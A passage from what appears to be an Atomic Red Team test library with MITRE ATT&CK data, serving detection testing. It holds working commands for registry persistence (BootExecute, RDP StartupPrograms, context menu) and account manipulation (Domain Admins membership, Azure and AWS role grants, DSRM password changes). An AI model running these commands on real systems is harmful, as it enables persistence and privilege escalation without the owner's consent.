properly. Only run on a test system. There is a reg export before running
the Atomic.\n"
supported_platforms:
- windows
input_arguments:
registry_value:
description: Registry value to set
type: string
default: autocheck autoche *
executor:
command: |
if (!(Test-Path "$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg")) { reg.exe export "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" "$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg" /y }
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager" -Name "BootExecute" -Value "#{registry_value}" -Type MultiString
cleanup_command: |
reg.exe import "$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg"
Remove-Item -Path "$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg" -Force
name: powershell
elevation_required: true
- name: Allowing custom application to execute during new RDP logon session
auto_generated_guid: b051b3c0-66e7-4a81-916d-e6383bd3a669
description: |
When a users logs in to a computer via RDP,Windows will search for the key in HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd registry
By default, rdpclip is the value stored. An attacker with administrator privileges can alter the value stored to allow for the custom application to execute during RDP login session.The test will allow running cal rather rdpclip when a user logs in via RDP
supported_platforms:
- windows
input_arguments:
malicious_app:
description: Application to be executed during successful RDP session
type: string
default: calc
executor:
command: 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd"
/f /v StartupPrograms /t REG_SZ /d "#{malicious_app}"
'
cleanup_command: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd"
/f /v StartupPrograms /t REG_SZ /d "rdpclip"
name: command_prompt
elevation_required: true
- name: Creating Boot Verification Program Key for application execution during
successful boot
auto_generated_guid: 6e1666d5-3f2b-4b9a-80aa-f011322380d4
description: |
Microsoft allows users to define a custom boot verification program for those situations by creating the registry key “HKLM\System\CurrentControlSet\Control\BootVerificationProgram” and setting the value of ImagePath to the path of boot verification program.Threat Actor
can abuse by creating this registry key and providing a malicious application to be executed during successful boot
supported_platforms:
- windows
input_arguments:
malicious_file:
description: Application to be executed during successful boot
type: string
default: C:\Program Files\Internet Explorer\iexplore.exe
executor:
command: 'reg add HKLM\System\CurrentControlSet\Control\BootVerificationProgram
/v ImagePath /t REG_SZ /d "#{malicious_file}"
'
cleanup_command: reg delete HKLM\System\CurrentControlSet\Control\BootVerificationProgram
/f
name: command_prompt
elevation_required: true
- name: Add persistence via Windows Context Menu
auto_generated_guid: de47f4a0-2acb-416d-9a6b-cee584a4c4d1
description: |
This atomic test add persistence taking advantage of the Windows Context Menu [Hexacorn](https://www.hexacorn.com/blog/2018/07/29/beyond-good-ol-run-key-part-82/)
User have to right click on the main screen or in the white space of the opened folder (e.g. Size Modify).
supported_platforms:
- windows
executor:
command: reg add "HKEY_CLASSES_ROOT\Directory\Background\shell\Size Modify\command"
/ve /t REG_SZ /d "C:\Windows\System32\calc.exe" /f
cleanup_command: reg delete "HKEY_CLASSES_ROOT\Directory\Background\shell\Size
Modify" /f
name: command_prompt
elevation_required: true
T1098:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27
created: '2017-05-31T21:31:12.196Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1098
external_id: T1098
- source_name: FireEye SMOKEDHAM June 2021
description: FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s
Supply Chain Software Compromise. Retrieved September 22, 2021.
url: https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html
- source_name: Microsoft Security Event 4670
description: Franklin Smith, R. (n.d.). Windows Security Log Event ID 4670.
Retrieved November 4, 2019.
url: https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4670
- source_name: Microsoft User Modified Event
description: 'Lich, B., Miroshnikov, A. (2017, April 5). 4738(S): A user account
was changed. Retrieved June 30, 2017.'
url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738
- source_name: InsiderThreat ChangeNTLM July 2017
description: Warren, J. (2017, July 11). Manipulating User Passwords with
Mimikatz. Retrieved December 4, 2017.
url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
- source_name: GitHub Mimikatz Issue 92 June 2017
description: 'Warren, J. (2017, June 22). lsadump::changentlm and lsadump::setntlm
work, but generate Windows events #92. Retrieved December 4, 2017.'
url: https://github.com/gentilkiwi/mimikatz/issues/92
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:10.273Z'
name: Account Manipulation
description: "Adversaries may manipulate accounts to maintain and/or elevate
access to victim systems. Account manipulation may consist of any action that
preserves or modifies adversary access to a compromised account, such as modifying
credentials or permission groups.(Citation: FireEye SMOKEDHAM June 2021) These
actions could also include account activity designed to subvert security policies,
such as performing iterative password updates to bypass password duration
policies and preserve the life of compromised credentials. \n\nIn order to
create or manipulate accounts, the adversary must already have sufficient
permissions on systems or the domain. However, account manipulation may also
lead to privilege escalation where modifications grant access to additional
roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078)."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Praetorian
- Tim MalcomVetter
- Wojciech Lesicki
- Arad Inbar, Fidelis Security
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Containers
- ESXi
- IaaS
- Identity Provider
- Linux
- macOS
- Network Devices
- Office Suite
- SaaS
- Windows
x_mitre_version: '2.8'
identifier: T1098
atomic_tests:
- name: Admin Account Manipulate
auto_generated_guid: 5598f7cb-cf43-455e-883a-f6008c5d46af
description: 'Manipulate Admin Account Name
'
supported_platforms:
- windows
executor:
command: |
$x = Get-Random -Minimum 2 -Maximum 9999
$y = Get-Random -Minimum 2 -Maximum 9999
$z = Get-Random -Minimum 2 -Maximum 9999
$w = Get-Random -Minimum 2 -Maximum 9999
Write-Host HaHa_$x$y$z
$fmm = Get-LocalGroupMember -Group Administrators |?{ $_.ObjectClass -match "User" -and $_.PrincipalSource -match "Local"} | Select Name
foreach($member in $fmm) {
if($member -like "*Administrator*") {
$account = $member.Name.Split("\")[-1] # strip computername\
$originalDescription = (Get-LocalUser -Name $account).Description
Set-LocalUser -Name $account -Description "atr:$account;$originalDescription".Substring(0,48) # Keep original name in description
Rename-LocalUser -Name $account -NewName "HaHa_$x$y$z" # Required due to length limitation
Write-Host "Successfully Renamed $account Account on " $Env:COMPUTERNAME
}
}
cleanup_command: |
$list = Get-LocalUser |?{$_.Description -like "atr:*"}
foreach($u in $list) {
$u.Description -match "atr:(?[^;]+);(?.*)"
Set-LocalUser -Name $u.Name -Description $Matches.Description
Rename-LocalUser -Name $u.Name -NewName $Matches.Name
Write-Host "Successfully Reverted Account $($u.Name) to $($Matches.Name) on " $Env:COMPUTERNAME
}
name: powershell
elevation_required: true
- name: Domain Account and Group Manipulate
auto_generated_guid: a55a22e9-a3d3-42ce-bd48-2653adb8f7a9
description: "Create a random atr-nnnnnnnn account and add it to a domain group
(by default, Domain Admins). \n\nThe quickest way to run it is against a domain
controller, using `-Session` of `Invoke-AtomicTest`. Alternatively,\nyou need
to install PS Module ActiveDirectory (in prereqs) and run the script with
appropriare AD privileges to \ncreate the user and alter the group. Automatic
installation of the dependency requires an elevated session, \nand is unlikely
to work with Powershell Core (untested).\n\nIf you consider running this test
against a production Active Directory, the good practise is to create a dedicated\nservice
account whose delegation is given onto a dedicated OU for user creation and
deletion, as well as delegated\nas group manager of the target group.\n\nExample:
`Invoke-AtomicTest -Session $session 'T1098' -TestNames \"Domain Account and
Group Manipulate\" -InputArgs @{\"group\" = \"DNSAdmins\" }`\n"
supported_platforms:
- windows
input_arguments:
account_prefix:
description: |
Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on
a match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful.
type: string
default: atr-
group:
description: Name of the group to alter
type: string
default: Domain Admins
create_args:
description: Additional string appended to New-ADUser call
type: string
default: ''
dependencies:
- description: 'PS Module ActiveDirectory
'
prereq_command: "Try {\n Import-Module ActiveDirectory -ErrorAction Stop
| Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n"
get_prereq_command: |
if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
} else {
Install-WindowsFeature RSAT-AD-PowerShell
}
executor:
command: |
$x = Get-Random -Minimum 2 -Maximum 99
$y = Get-Random -Minimum 2 -Maximum 99
$z = Get-Random -Minimum 2 -Maximum 99
$w = Get-Random -Minimum 2 -Maximum 99
Import-Module ActiveDirectory
$account = "#{account_prefix}-$x$y$z"
New-ADUser -Name $account -GivenName "Test" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args}
Add-ADGroupMember "#{group}" $account
cleanup_command: 'Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))"
| Remove-ADUser -Confirm:$False
'
name: powershell
- name: AWS - Create a group and add a user to that group
auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122
description: 'Adversaries create AWS group, add users to specific to that group
to elevate their privileges to gain more accesss
'
supported_platforms:
- iaas:aws
input_arguments:
username:
description: Name of the AWS group to create
type: string
default: atomicredteam
dependencies:
- description: 'Check if the user exists, we can only add a user to a group
if the user exists.
'
prereq_command: 'aws iam list-users | grep #{username}
'
get_prereq_command: 'echo Please run atomic test T1136.003, before running
this atomic test
'
executor:
command: |
aws iam create-group --group-name #{username}
aws iam add-user-to-group --user-name #{username} --group-name #{username}
cleanup_command: |
aws iam remove-user-from-group --user-name #{username} --group-name #{username}
aws iam delete-group --group-name #{username}
name: sh
- name: Azure AD - adding user to Azure AD role
auto_generated_guid: 0e65ae27-5385-46b4-98ac-607a8ee82261
description: "The adversaries want to add user to some Azure AD role. Threat
actor \nmay be interested primarily in highly privileged roles, e.g. Global
Administrator, Application Administrator, \nPrivileged Authentication Administrator
(this role can reset Global Administrator password!).\nBy default, the role
Global Reader is assigned to the user principal in this test.\n\nThe account
you use to run the PowerShell command should have Privileged Role Administrator
or Global Administrator role in your Azure AD.\n\nDetection hint - check Activity
\"Add member to role\" in Azure AD Audit Logs. In targer you will also see
User as a type.\n"
supported_platforms:
- azure-ad
input_arguments:
username:
description: Azure AD username
type: string
default: jonh@contoso.com
password:
description: Azure AD password
type: string
default: p4sswd
user_principal_name:
description: Display Name, or User Principal Name, of the targeted user
principal
type: string
default: SuperUser
role_name:
description: Name of the targeted Azure AD role
type: string
default: Global Reader
dependencies:
- description: 'AzureAD module must be installed.
'
prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
{exit 0} else {exit 1}} catch {exit 1}
'
get_prereq_command: 'Install-Module -Name AzureAD -Force
'
executor:
command: |
Import-Module -Name AzureAD
$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
Connect-AzureAD -Credential $Credential
$user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
if ($user -eq $null) { Write-Warning "User not found"; exit }
$role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
if ($role -eq $null) { Write-Warning "Role not found"; exit }
Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId
Write-Host "User $($user.DisplayName) was added to $($role.DisplayName) role"
cleanup_command: |
Import-Module -Name AzureAD -ErrorAction Ignore
$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
Connect-AzureAD -Credential $Credential -ErrorAction Ignore
$user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
if ($user -eq $null) { Write-Warning "User not found"; exit }
$role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
if ($role -eq $null) { Write-Warning "Role not found"; exit }
Remove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $user.ObjectId
Write-Host "User $($user.DisplayName) was removed from $($role.DisplayName) role"
name: powershell
elevation_required: false
- name: Azure AD - adding service principal to Azure AD role
auto_generated_guid: 92c40b3f-c406-4d1f-8d2b-c039bf5009e4
description: "The adversaries want to add service principal to some Azure AD
role. Threat actor \nmay be interested primarily in highly privileged roles,
e.g. Global Administrator, Application Administrator, \nPrivileged Authentication
Administrator (this role can reset Global Administrator password!).\nBy default,
the role Global Reader is assigned to service principal in this test.\n\nThe
account you use to run the PowerShell command should have Privileged Role
Administrator or Global Administrator role in your Azure AD.\n\nDetection
hint - check Activity \"Add member to role\" in Azure AD Audit Logs. In targer
you will also see Service Principal as a type.\n"
supported_platforms:
- azure-ad
input_arguments:
username:
description: Azure AD username
type: string
default: jonh@contoso.com
password:
description: Azure AD password
type: string
default: p4sswd
service_principal_name:
description: Name of the service principal
type: string
default: SuperSP
role_name:
description: Name of the targeted Azure AD role
type: string
default: Global Reader
dependencies:
- description: 'AzureAD module must be installed.
'
prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
{exit 0} else {exit 1}} catch {exit 1}
'
get_prereq_command: 'Install-Module -Name AzureAD -Force
'
executor:
command: |
Import-Module -Name AzureAD
$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
Connect-AzureAD -Credential $Credential
$sp = Get-AzureADServicePrincipal -Filter "DisplayName eq '#{service_principal_name}'"
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
$role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
if ($role -eq $null) { Write-Warning "Role not found"; exit }
Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId
Write-Host "Service Principal $($sp.DisplayName) was added to $($role.DisplayName)"
cleanup_command: |
Import-Module -Name AzureAD -ErrorAction Ignore
$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
Connect-AzureAD -Credential $Credential -ErrorAction Ignore
$sp = Get-AzureADServicePrincipal -Filter "DisplayName eq '#{service_principal_name}'"
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
$role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
if ($role -eq $null) { Write-Warning "Role not found"; exit }
Remove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $sp.ObjectId
Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.DisplayName) role"
name: powershell
elevation_required: false
- name: Azure - adding user to Azure role in subscription
auto_generated_guid: 1a94b3fc-b080-450a-b3d8-6d9b57b472ea
description: "The adversaries want to add user to some Azure role, also called
Azure resource role. Threat actor \nmay be interested primarily in highly
privileged roles, e.g. Owner, Contributor.\nBy default, the role Reader is
assigned to user in this test.\n\nNew-AzRoleAssignment cmdlet could be also
use to assign user/service principal to resource, resource group and management
group.\n\nThe account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write
\n(e.g. such as User Access Administrator or Owner) and the Azure Active Directory
Graph Directory.Read.All \nand Microsoft Graph Directory.Read.All permissions.\n\nDetection
hint - check Operation Name \"Create role assignment\" in subscriptions Activity
Logs.\n"
supported_platforms:
- iaas:azure
input_arguments:
username:
description: Azure AD username
type: string
default: jonh@contoso.com
password:
description: Azure AD password
type: string
default: p4sswd
user_principal_name:
description: Display Name, or User Principal Name, of the targeted user
principal
type: string
default: SuperUser
role_name:
description: Name of the targeted Azure role
type: string
default: Reader
subscription:
description: Name of the targeted subscription
type: string
default: Azure subscription 1
dependencies:
- description: 'Az.Resources module must be installed.
'
prereq_command: 'try {if (Get-InstalledModule -Name Az.Resources -ErrorAction
SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
'
get_prereq_command: 'Install-Module -Name Az.Resources -Force
'
executor:
command: |
Import-Module -Name Az.Resources
$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
Connect-AzAccount -Credential $Credential
$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
if ($user -eq $null) { Write-Warning "User not found"; exit }
$subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
$role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
if ($role -eq $null) { Write-Warning "Role not found"; exit }
New-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
Write-Host "User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)"
cleanup_command: |
Import-Module -Name AzureAD -ErrorAction Ignore
$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
Connect-AzAccount -Credential $Credential -ErrorAction Ignore
$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
if ($user -eq $null) { Write-Warning "User not found"; exit }
$subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
$role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
if ($role -eq $null) { Write-Warning "Role not found"; exit }
Remove-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
Write-Host "User Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptions.Name)"
name: powershell
elevation_required: false
- name: Azure - adding service principal to Azure role in subscription
auto_generated_guid: c8f4bc29-a151-48da-b3be-4680af56f404
description: "The adversaries want to add service principal to some Azure role,
also called Azure resource role. Threat actor \nmay be interested primarily
in highly privileged roles, e.g. Owner, Contributor.\nBy default, the role
Reader is assigned to service principal in this test.\n\nNew-AzRoleAssignment
cmdlet could be also use to assign user/service principal to resource, resource
group and management group.\n\nThe account you use to run the PowerShell command
must have Microsoft.Authorization/roleAssignments/write \n(e.g. such as User
Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All
\nand Microsoft Graph Directory.Read.All permissions.\n\nDetection hint -
check Operation Name \"Create role assignment\" in subscriptions Activity
Logs.\n"
supported_platforms:
- iaas:azure
input_arguments:
username:
description: Azure AD username
type: string
default: jonh@contoso.com
password:
description: Azure AD password
type: string
default: p4sswd
service_principal_name:
description: Name of the service principal
type: string
default: SuperSP
role_name:
description: Name of the targeted Azure role
type: string
default: Reader
subscription:
description: Name of the targeted subscription
type: string
default: Azure subscription 1
dependencies:
- description: 'Az.Resources module must be installed.
'
prereq_command: 'try {if (Get-InstalledModule -Name Az.Resources -ErrorAction
SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
'
get_prereq_command: 'Install-Module -Name Az.Resources -Force
'
executor:
command: "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString
-String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName
System.Management.Automation.PSCredential -ArgumentList \"#{username}\",
$Pword\nConnect-AzAccount -Credential $Credential\n\n$sp = Get-AzADServicePrincipal
| where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp
-eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$subscription
= Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"} \nif
($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit
}\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif
($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment
-ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host
\"Service Principal $($sp.DisplayName) was added to $($role.Name) role in
subscriptions $($subscriptions.Name)\"\n"
cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord
= ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential
= New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList
\"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential -ErrorAction
Ignore\n\n$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName
-eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service
Principal not found\"; exit }\n$subscription = Get-AzSubscription | where-object
{$_.Name -eq \"#{subscription}\"} \nif ($subscription -eq $null) { Write-Warning
\"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object
{$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role
not found\"; exit }\n\nRemove-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId
$role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal
$($sp.DisplayName) was removed from $($role.Name) role in subscriptions
$($subscriptions.Name)\"\n"
name: powershell
elevation_required: false
- name: Azure AD - adding permission to application
auto_generated_guid: 94ea9cc3-81f9-4111-8dde-3fb54f36af4b
description: |
The adversaries want to add permission to newly created application. Application could be then used for persistence or for further operation in the attacked infrastructure. Permissions like AppRoleAssignment.ReadWrite.All or RoleManagement.ReadWrite.Directory in particular can be a valuable target for a threat actor.
This technique will create a new app, with the provided name, and give it the provided permission. But if you prefer to add credentials to an existing app, replace in the code: "Get-AzureADApplication" instead of "New-AzureADServicePrincipal".
The DirectoryRecommendations.Read.All permissions has been selected as the default.
The account you use to run the PowerShell command should have Global Administrator/Application Administrator/Cloud Application Administrator role in your Azure AD.
Detection hint - check Operation Name "Add app role assignment to service principal" in subscriptions Activity Logs.
You can also take a look at the materials:
https://learnsentinel.blog/2022/01/04/azuread-privesc-sentinel/
https://github.com/reprise99/Sentinel-Queries
https://docs.google.com/presentation/d/1AWx1w0Xcq8ENvOmSjAJswEgEio-il09QWZlGg9PbHqE/edit#slide=id.g10460eb209c_0_2766
https://gist.github.com/andyrobbins/7c3dd62e6ed8678c97df9565ff3523fb
supported_platforms:
- azure-ad
input_arguments:
username:
description: Azure AD username
type: string
default: jonh@contoso.com
password:
description: Azure AD password
type: string
default: p4sswd
application_name:
description: Name of the targeted application that will be created
type: string
default: test_app
application_permission:
description: Permission from Microsoft Graph Resource API that will be added
to application
type: string
default: DirectoryRecommendations.Read.All
dependencies:
- description: 'AzureAD module must be installed.
'
prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
{exit 0} else {exit 1}} catch {exit 1}
'
get_prereq_command: 'Install-Module -Name AzureAD -Force
'
executor:
command: "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String
\"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName
System.Management.Automation.PSCredential -ArgumentList \"#{username}\",
$Pword\nConnect-AzureAD -Credential $Credential\n\n$aadApplication = New-AzureADApplication
-DisplayName \"#{application_name}\"\n$servicePrincipal = New-AzureADServicePrincipal
-AppId $aadApplication.AppId\n#$aadApplication = Get-AzureADApplication
-Filter \"DisplayName eq '#{application_name}'\"\n\n#Get Service Principal
of Microsoft Graph Resource API \n$graphSP = Get-AzureADServicePrincipal
-Filter \"DisplayName eq 'Microsoft Graph'\"\n\n#Initialize RequiredResourceAccess
for Microsoft Graph Resource API \n$requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess\n$requiredGraphAccess.ResourceAppId
= $graphSP.AppId\n$requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]\n\n#Set
Application Permissions\n$ApplicationPermissions = @('#{application_permission}')\n\n$reqPermission
= $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}\nif($reqPermission)\n{\n$resourceAccess
= New-Object Microsoft.Open.AzureAD.Model.ResourceAccess\n$resourceAccess.Type
= \"Role\"\n$resourceAccess.Id = $reqPermission.Id \n#Add required app
permission\n$requiredGraphAccess.ResourceAccess.Add($resourceAccess)\n}\nelse\n{\nWrite-Host
\"App permission $permission not found in the Graph Resource API\" -ForegroundColor
Red\n}\n\n#Add required resource accesses\n$requiredResourcesAccess = New-Object
System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]\n$requiredResourcesAccess.Add($requiredGraphAccess)\n\n#Set
permissions in existing Azure AD App\nSet-AzureADApplication -ObjectId $aadApplication.ObjectId
-RequiredResourceAccess $requiredResourcesAccess\n\n$servicePrincipal =
Get-AzureADServicePrincipal -Filter \"AppId eq '$($aadApplication.AppId)'\"\n\nNew-AzureADServiceAppRoleAssignment
-ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId
-ResourceId $graphSP.ObjectId -Id $reqPermission.Id\n"
cleanup_command: |
Import-Module -Name AzureAD
$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
Connect-AzureAD -Credential $Credential
$aadApplication = @(Get-AzureADApplication -Filter "DisplayName eq '#{application_name}'")
If ($aadApplication.Count -eq 0)
{
Write-Host "App not found: cannot delete it"
exit
}
ElseIf ($aadApplication.Count -gt 1)
{
Write-Host "Found several app with name '#{application_name}': one is likely the one this technique created, but as a precaution, none will be deleted. Manual cleanup is required."
exit
}
Else
{
Remove-AzureADApplication -ObjectId $aadApplication[0].ObjectId
Write-Host "Successfully deleted app"
}
name: powershell
elevation_required: false
- name: Password Change on Directory Service Restore Mode (DSRM) Account
auto_generated_guid: d5b886d9-d1c7-4b6e-a7b0-460041bf2823
description: 'Change the password on the Directory Service Restore Mode (DSRM)
account using ntdsutil by syncing to existing account
'
supported_platforms:
- windows
input_arguments:
sync_account:
description: Account to sync password from
type: string
default: "%username%"
executor:
name: command_prompt
elevation_required: true
command: 'ntdsutil "set dsrm password" "sync from domain account #{sync_account}"
"q" "q"
'
- name: 'Domain Password Policy Check: Short Password'
auto_generated_guid: fc5f9414-bd67-4f5f-a08e-e5381e29cbd1
description: |
Attempt to change the password of the current domain user in order to check password policy. Ideally, you would only run this atomic test to verify that your password policy is blocking the use of the new password.
If the password is succesfully changed to the new password, the credential file will be updated to reflect the new password. You can then run the atomic manually and specify a new password of your choosing, however the
password policy will likely prevent you from setting the password back to what it was.
supported_platforms:
- windows
input_arguments:
new_password:
description: The password to set for the current domain user (default value
is 7 characters)
type: string
default: Uplow-1
cred_file:
description: A file containing the password of the current user
type: path
default: "$env:LOCALAPPDATA\\AtomicRedTeam\\$env:USERNAME.txt"
dependencies:
- description: 'Password for current user must be stored in a credential file
'
prereq_command: 'if (Test-Path #{cred_file}) {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{cred_file}") -ErrorAction Ignore | Out-Null
$cred = Get-Credential -UserName $env:USERNAME -message "Enter password for $env:USERNAME to use during password change attempt"
$cred.Password | ConvertFrom-SecureString | Out-File "#{cred_file}"
executor:
name: powershell
command: "$credFile = \"#{cred_file}\"\nif (Test-Path $credFile) {\n $cred
= New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList
$env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString)\n if($cred.GetNetworkCredential().Password
-eq \"#{new_password}\"){\n Write-Host -ForegroundColor Yellow \"The
new password is the same as the password stored in the credential file.
Please specify a different new password.\"; exit -1\n }\n try {\n
\ $newPassword = ConvertTo-SecureString #{new_password} -AsPlainText
-Force\n Set-ADAccountPassword -Identity $env:USERNAME -OldPassword
$cred.password -NewPassword $newPassword\n }\n catch { \n $_.Exception\n
\ $errCode = $_.Exception.ErrorCode\n Write-Host \"Error code:
$errCode\"\n if ($errCode -eq 86) {\n Write-Host -ForegroundColor
Yellow \"The stored password for the current user is incorrect. Please run
the prereq commands to set the correct credentials\"\n Remove-Item
$credFile\n }\n exit $errCode\n }\n Write-Host -ForegroundColor
Cyan \"Successfully changed the password to #{new_password}\"\n $newCred
= New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString
\"#{new_password}\" -AsPlainText -Force))\n $newCred.Password | ConvertFrom-SecureString
| Out-File $credFile\n}\nelse {\n Write-Host -ForegroundColor Yellow
\"You must store the password of the current user by running the prerequisite
commands first\"\n}\n"
- name: 'Domain Password Policy Check: No Number in Password'
auto_generated_guid: 68190529-069b-4ffc-a942-919704158065
description: "Attempt to change the password of the current domain user in order
to check password policy. Ideally, you would only run this atomic test to
verify that your password policy is blocking the use of the new password.\nIf
the password is succesfully changed to the new password, the credential file
will be updated to reflect the new password. You can then run the atomic manually
and specify a new password of your choosing, however the\npassword policy
will likely prevent you from setting the password back to what it was. \n"
supported_platforms:
- windows
input_arguments:
new_password:
description: The password to set for the current domain user (default is
long and has upper and lower case and special character but no number)
type: string
default: UpperLowerLong-special
